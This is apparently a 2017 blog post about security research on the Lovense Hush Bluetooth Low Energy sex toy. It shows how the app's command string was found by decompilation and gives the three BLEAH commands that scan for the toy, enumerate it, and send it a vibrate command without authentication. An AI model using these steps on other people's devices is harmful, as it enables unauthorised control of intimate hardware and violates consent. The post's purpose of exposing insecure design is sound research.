Hack a BT Low Energy (BLE) butt plug

Butt blug - Hush by Lovesense
Butt plug – Hush by Lovesense

Few weeks ago I bought a Bluetooth Low Energy (BLE) butt plug to test the (in)security of BLE protocol.

This caught my attention after researchers told us that a lot of sex toys use this protocol to allow remote control that is insecure by design.

The great Simone evilsocket Margaritelli wrote a BLE scanner called BLEAH (get it on github) and a wonderful post on how to use it to hack BLE devices. I strongly suggest you to read the post before moving on.

Everything started as a joke between me and Simone before going to HackInBo (the best free security event in Italy) when Simone said to me “if you buy it we  pentest it in Bologna“.

I bought it 🙂 and during HackInBo we hacked the butt plug using BLEAH (Lovense Hush model). Simone deserves all the creditis for this, I just learned from him.

The offer from @evilsocket
The offer from @evilsocket

This is the final result. I paired to the BLE butt plug device without authentication or PIN from my laptop and sent the vibrate command.

How get the command? The butt plug can be remotely controlled with a mobile application called Lovense Remote (download here).
With jadx you can disassemble the java application and find the Bluetooth class used to control the device. Inside you can find the strings to be sent to the toy to start vibration (Vibrate:20;).

Lovense Remote disassembled
Lovense Remote disassembled

So we have all the elements to hack the sex toy with BLEAH (read evilsocket post before) as follow:

// scan for the device
$ sudo bleah -t0

// get device services and characteristics
$ sudo bleah -b "< DEVICE MAC >" -e

// send the vibrate command to the writable charateristic
$ sudo bleah -b "< DEVICE MAC >" -u < CHARATERISTIC UUID > -d "Vibrate:20;"
Hack all the things
Hack all the things

At the end is very easy to hack BLE protocol due to poor design choices. Welcome to 2017.

Welcome to 2017
Welcome to 2017

153 thoughts on “Hack a BT Low Energy (BLE) butt plug

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.